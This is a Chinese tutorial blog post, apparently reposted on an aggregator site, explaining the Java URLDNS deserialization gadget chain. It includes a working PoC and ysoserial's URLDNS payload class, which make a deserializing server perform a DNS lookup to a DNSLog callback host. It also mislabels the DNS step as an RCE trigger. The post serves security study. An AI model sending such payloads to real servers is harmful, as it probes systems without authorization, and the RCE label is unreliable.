URLDNS利用链

news2024/12/26 21:29:51

利用链分析在我的Github主页
Java反序列化学习

下面写下POC思路

利用点HashMap的readObject

    private void readObject(java.io.ObjectInputStream s)
        throws IOException, ClassNotFoundException {
        // Read in the threshold (ignored), loadfactor, and any hidden stuff
        s.defaultReadObject();
        reinitialize();
        if (loadFactor <= 0 || Float.isNaN(loadFactor))
            throw new InvalidObjectException("Illegal load factor: " +
                                             loadFactor);
        s.readInt();                // Read and ignore number of buckets
        int mappings = s.readInt(); // Read number of mappings (size)
        if (mappings < 0)
            throw new InvalidObjectException("Illegal mappings count: " +
                                             mappings);
        else if (mappings > 0) { // (if zero, use defaults)
            // Size the table using given load factor only if within
            // range of 0.25...4.0
            float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);
            float fc = (float)mappings / lf + 1.0f;
            int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
                       DEFAULT_INITIAL_CAPACITY :
                       (fc >= MAXIMUM_CAPACITY) ?
                       MAXIMUM_CAPACITY :
                       tableSizeFor((int)fc));
            float ft = (float)cap * lf;
            threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
                         (int)ft : Integer.MAX_VALUE);

            // Check Map.Entry[].class since it's the nearest public type to
            // what we're actually creating.
            SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, cap);
            @SuppressWarnings({"rawtypes","unchecked"})
            Node<K,V>[] tab = (Node<K,V>[])new Node[cap];
            table = tab;

            // Read the keys and values, and put the mappings in the HashMap
            for (int i = 0; i < mappings; i++) {
                @SuppressWarnings("unchecked")
                    K key = (K) s.readObject();
                @SuppressWarnings("unchecked")
                    V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false);
            }
        }
    }

看下对应的writeObject

private void writeObject(java.io.ObjectOutputStream s)
    throws IOException {
    int buckets = capacity();
    // Write out the threshold, loadfactor, and any hidden stuff
    s.defaultWriteObject();
    s.writeInt(buckets);
    s.writeInt(size);
    internalWriteEntries(s);
}

internalWriteEntries(s);函数

tab.key对应的是我们的URL

    void internalWriteEntries(java.io.ObjectOutputStream s) throws IOException {
        Node<K,V>[] tab;
        if (size > 0 && (tab = table) != null) {
            for (int i = 0; i < tab.length; ++i) {
                for (Node<K,V> e = tab[i]; e != null; e = e.next) {
                    s.writeObject(e.key);
                    s.writeObject(e.value);
                }
            }
        }
    }

我们要修改tab中的K,从而达到写入URL的目的,下面看如何写入tab。

用到的是put方法

image-20240621092333174

    public V put(K key, V value) {
        return putVal(hash(key), key, value, false, true);
    }

这里注意一下在put函数中调用了利用链中的putVal函数,后面也会触发DNS请求。为了不将这次请求与目标请求弄混,这里有两种方法。

  1. 给URL变量赋值

在URL hashCode函数中会做个判断,我们将hashCode设置为一个不等于-1的值,就可以不在POC截断触发RCE触发点。

但是要记得在反序列化之前需要将hashCode改回-1

public synchronized int hashCode() {
    if (hashCode != -1)
        return hashCode;

    hashCode = handler.hashCode(this);
    return hashCode;
}
  1. ysoserial的方法

覆盖了URLStreamHandler中的openConnection和getHostAddress方法,其中getHosAddress是本利用链RCE触发点。

        static class SilentURLStreamHandler extends URLStreamHandler {

                protected URLConnection openConnection(URL u) throws IOException {
                        return null;
                }

                protected synchronized InetAddress getHostAddress(URL u) {
                        return null;
                }
        }

最后给出自己写的POC

package ysoserial.poc;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class urldns {
    public static void main(String[] args) throws Exception {
        HashMap hashmap = new HashMap();
        URL url = new URL("http://ybnlxi.dnslog.cn");//url
        Field field = Class.forName("java.net.URL").getDeclaredField("hashCode");
        field.setAccessible(true);//hashCode为私有对象
        field.set(url,666);//将url对象的hashCode值设置为666!=-1
        hashmap.put(url, 1);
        field.set(url, -1);//反序列化时hashCode值为-1
        try {
            FileOutputStream fileOutputStream = new FileOutputStream("./s.ser");
            ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
            objectOutputStream.writeObject(hashmap);
            objectOutputStream.close();
            fileOutputStream.close();

            FileInputStream fileInputStream = new FileInputStream("./s.ser");
            ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream);
            objectInputStream.readObject();
            fileInputStream.close();
            objectInputStream.close();
        }
        catch (Exception e) {
            e.printStackTrace();;
        }
    }
}

测试

image-20240621105557092

ysoserial的POC

package ysoserial.payloads;

import java.io.IOException;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/**
 * A blog post with more details about this gadget chain is at the url below:
 *   https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/
 *
 *   This was inspired by  Philippe Arteau @h3xstream, who wrote a blog
 *   posting describing how he modified the Java Commons Collections gadget
 *   in ysoserial to open a URL. This takes the same idea, but eliminates
 *   the dependency on Commons Collections and does a DNS lookup with just
 *   standard JDK classes.
 *
 *   The Java URL class has an interesting property on its equals and
 *   hashCode methods. The URL class will, as a side effect, do a DNS lookup
 *   during a comparison (either equals or hashCode).
 *
 *   As part of deserialization, HashMap calls hashCode on each key that it
 *   deserializes, so using a Java URL object as a serialized key allows
 *   it to trigger a DNS lookup.
 *
 *   Gadget Chain:
 *     HashMap.readObject()
 *       HashMap.putVal()
 *         HashMap.hash()
 *           URL.hashCode()
 *
 *
 */
@SuppressWarnings({ "rawtypes", "unchecked" })
@PayloadTest(skip = "true")
@Dependencies()
@Authors({ Authors.GEBL })
public class URLDNS implements ObjectPayload<Object> {

        public Object getObject(final String url) throws Exception {

                //Avoid DNS resolution during payload creation
                //Since the field <code>java.net.URL.handler</code> is transient, it will not be part of the serialized payload.
                URLStreamHandler handler = new SilentURLStreamHandler();

                HashMap ht = new HashMap(); // HashMap that will contain the URL
                URL u = new URL(null, url, handler); // URL to use as the Key
                ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

                Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.

                return ht;
        }

        public static void main(final String[] args) throws Exception {
                PayloadRunner.run(URLDNS.class, args);
        }

        /**
         * <p>This instance of URLStreamHandler is used to avoid any DNS resolution while creating the URL instance.
         * DNS resolution is used for vulnerability detection. It is important not to probe the given URL prior
         * using the serialized object.</p>
         *
         * <b>Potential false negative:</b>
         * <p>If the DNS name is resolved first from the tester computer, the targeted server might get a cache hit on the
         * second resolution.</p>
         */
        static class SilentURLStreamHandler extends URLStreamHandler {

                protected URLConnection openConnection(URL u) throws IOException {
                        return null;
                }

                protected synchronized InetAddress getHostAddress(URL u) {
                        return null;
                }
        }
}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1846484.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

大数据学习-Hadoop

介绍 是 Apache 的顶级开源项目&#xff0c;一个分布式框架&#xff0c;主要功能&#xff1a; 分布式大数据存储——HDFS 组件分布式大数据计算——MapReduce 组件分布式资源调度——YARN 组件 可以通过它来构建集群&#xff0c;完成大数据的存储和计算 学习起来相对简单&…

中国计算机学会芯片大会 (CCF Chip 2024)

&#x1f31f; 中国计算机学会芯片大会(CCF Chip Conference&#xff0c;简称&#xff1a;CCF Chip) 将于&#x1f4c5; 2024年7月19日至21日在上海市松江区上海富悦大酒店召开。 &#x1f389; #CCF Chip 2024# 主题前瞻&#xff1a;"发展芯技术&#xff0c;智算芯未来&q…

树结构与算法-杨辉三角形的两种实现

什么是杨辉三角形 本文旨在讨论普通杨辉三角形的两种实现方式&#xff1a;迭代法和递归法。我们不详细讲解杨辉三角形的数学问题&#xff0c;只研究其代码实现。 杨辉三角形大致如下图&#xff1a; 杨辉三角形的规律 通过对杨辉三角形的图形分析&#xff0c;我们可以看到这几点…

CVPR最佳学生论文!1千万张图像、跨越45万+物种的超大数据集,多模态模型BioCLIP实现零样本学习

不同于传统学术领域对期刊发表的重视&#xff0c;计算机界&#xff0c;尤其是机器学习、计算机视觉、人工智能等领域&#xff0c;顶级会议才是王道&#xff0c;无数「热门研究方向」、「创新方法」都将从这里流出。 作为计算机视觉乃至人工智能领域最具学术影响力的三大顶会之…

【论文笔记】The Power of Scale for Parameter-Effificient Prompt Tuning

题目: The Power of Scale for Parameter-Effificient Prompt Tuning 来源: EMNLP 2021 模型名称: Soft-Prompt 论文链接: https://aclanthology.org/2021.emnlp-main.243/ 项目链接: https://github.com/google-research/prompt-tuning 核心&#xff1a;针对不同的任务设计不同…

基于STM32和人工智能的智能交通信号控制系统

目录 引言环境准备智能交通信号控制系统基础代码实现&#xff1a;实现智能交通信号控制系统 4.1 数据采集模块4.2 数据处理与分析4.3 控制系统4.4 用户界面与数据可视化应用场景&#xff1a;智能交通管理与优化问题解决方案与优化收尾与总结 1. 引言 随着城市化进程的加快&a…

16s功能注释--PICRUST2的安装及使用

文章目录 安装本地安装conda安装 使用一些报错 安装 本地安装 在github网址下载压缩包&#xff1a;https://github.com/picrust/picrust2/releases/tag/v2.5.2 解压后将bin目录设置到环境变量 conda安装 利用bioconda安装 conda create -n picrust2 -c bioconda -c conda-…

神经网络与模式识别课程报告-卷积神经网络(CNN)算法的应用

完整的神经网络与模式识别课程报告文档下载&#xff1a; https://wenku.baidu.com/view/393fbc7853e2524de518964bcf84b9d528ea2c92?aggId393fbc7853e2524de518964bcf84b9d528ea2c92&frcatalogMain_&_wkts_1718955412936 def get_information():方法名称: 获取资料或…

以餐厅为例,来谈谈VOC(客户之声)

VOC&#xff0c;即客户之声&#xff0c;是指通过收集和分析客户的反馈意见&#xff0c;了解他们的需求和期望&#xff0c;进而指导企业改进产品和服务。在餐厅经营中&#xff0c;VOC的应用不仅能够帮助餐厅了解顾客的口味偏好、用餐习惯&#xff0c;还能揭示服务流程中的不足和…

插件分析|Yaklang SQL Injection 检测启发式算法

背景 sqlmap作为一个老牌的成熟的SQL漏洞扫描工具&#xff0c;在SQL注入自动化检测领域独占一壁江山。而现在的SQL注入检测往往是通过被动扫描检出&#xff0c;再通过sqlmap或者手工注入的方式进行进一步的漏洞确认和利用。在这种情形下&#xff0c;我们就需要开发一款应用于被…

ATFX Connect四度加冕!荣膺2024最佳机构业务经纪商奖

近期&#xff0c;知名经纪商ATFX凭借在公益、科技、教育及媒体领域的一系列创新营销举措&#xff0c;掀起一波营销热潮&#xff0c;品牌联动效应显著。日前&#xff0c;ATFX又以实力而赢得一项新荣誉。全球知名媒体Holiston Media举办的2024环球金融大奖 (Global Forex Awards …

10个超好看的 404 页面(附源码)

今天来分享 10 个超好看的 404 页面&#xff0c;带动画效果。 代码&#xff1a;https://codepen.io/AsyrafHussin/pen/KxWRrK 代码&#xff1a;https://codepen.io/salehriaz/pen/erJrZM 代码&#xff1a;https://codepen.io/andrew-lawendy/pen/deOpMZ 代码&#xff1a;https…

如何减轻大语言模型中的幻觉?

ChatGPT、LLaMA 和 Mistral 等大型语言模型 (LLMs) 是强大的自然语言处理 (NLP) 工具&#xff0c;能够为各种应用生成流畅且连贯的文本。然而&#xff0c;他们也有一个主要缺点&#xff1a;他们倾向于产生幻觉&#xff0c;而这些事实或细节不受输入或现实世界的支持。这可能会导…

《传感器系列》温度传感器

温度传感器是一种能够测量温度并将温度信号转换为电信号或其他可输出信号的装置。 它在众多领域都有广泛应用&#xff0c;比如&#xff1a; - 工业生产&#xff1a; 用于监测生产过程中的温度&#xff0c;确保生产工艺的正常进行和产品质量的稳定。 - 智能家居&#xff1a; …

PCB设计中的via孔和pad孔

原文出自微信公众号【小小的电子之路】 在PCB设计过程中&#xff0c;经常会提到via孔和pad孔&#xff0c;下面就简单介绍一下二者的区别。 via称为过孔&#xff0c;主要起到电气连接的作用&#xff0c;用于网络在不同层的导线之间的连接。PCB设计中一般做盖油处理。 via孔 vi…

Kotlin 中的可见修饰符

Java 和 Kotlin 中的可见修饰符&#xff1a; Java&#xff1a;public、private、protected 和 default(什么都不写)&#xff1b;Kotlin&#xff1a;public、private、protected 和 internal&#xff1b; 比较&#xff1a; 对于 public 修饰符&#xff1a;在 Java 和 Kotlin 中…

Linux网络 - 再谈、详谈UDP和TCP协议

文章目录 前言预备netstatpidofcat /etc/services 一、UDP协议UDP协议端格式UDP的缓冲区基于UDP的应用层协议 二、TCP协议1.TCP协议段格式确认应答(ACK)机制三次握手疑问1 最后一次客户端发给服务端的ACK请求怎么保证服务端能够收到&#xff1f; 四次挥手疑问2 为什么挥手是四次…

openssl 命令行生成密钥对,生成hash,PSS填充签名,校验

生成密钥对 openssl genpkey -algorithm RSA -out private_key.pem -pkeyopt rsa_keygen_bits:4096 openssl rsa -pubout -in private_key.pem -out public_key.pem将源文件data.txt生成hash值&#xff08;sha-256&#xff09; openssl dgst -sha256 -binary data.txt > d…

利用LabVIEW项目管理和组织LabVIEW应用程序

如何利用LabVIEW项目管理和组织LabVIEW应用程序&#xff0c;提供了关于文件定义、磁盘上的文件组织、LabVIEW项目浏览器、交叉链接和相关资源的建议。这些推荐在开发前就应建立&#xff0c;以确保应用程序能扩展到大量VIs并适应多开发者环境。 目录 定义和识别应用程序文件 磁…

第106天:权限提升-WIN 系统AD域控NetLogonADCSPACKDCCVE 漏洞

目录 案例一&#xff1a;WIN-域控提权-CVE-2014-6324 案例二&#xff1a;WIN-域控提权-CVE-2020-1472 案例三&#xff1a;WIN-域控提权-CVE-2021-42287 案例四&#xff1a;WIN-域控提权-CVE-2022-26923 案例一&#xff1a;WIN-域控提权-CVE-2014-6324 首先先部署域控 项目…